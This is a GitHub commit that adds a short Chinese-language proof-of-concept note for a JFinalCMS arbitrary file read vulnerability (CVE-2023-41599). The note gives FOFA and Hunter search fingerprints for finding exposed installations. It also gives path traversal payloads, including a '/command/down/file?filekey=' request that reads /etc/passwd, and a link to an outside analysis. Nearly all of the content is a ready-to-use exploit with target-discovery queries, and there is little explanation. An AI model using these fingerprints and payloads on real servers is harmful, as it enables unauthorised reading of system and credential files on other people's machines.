Create JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md

This commit is contained in:
wy876
2023-09-20 17:48:03 +08:00
committed by GitHub
parent b26e0d9c39
commit 0561f20ed5

View File

@@ -0,0 +1,23 @@
## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
## 特征
```fofa:
body="content=\"JreCms"
hunter:
web.body="content=\"JreCms"
```
## POC
```
Windows: /../../../../../../../../../test.txt
Linux: /../../../../../../../../../etc/passwd
/command/down/file?filekey=/../../../../../../../../../etc/passwd
```
## 漏洞分析
http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/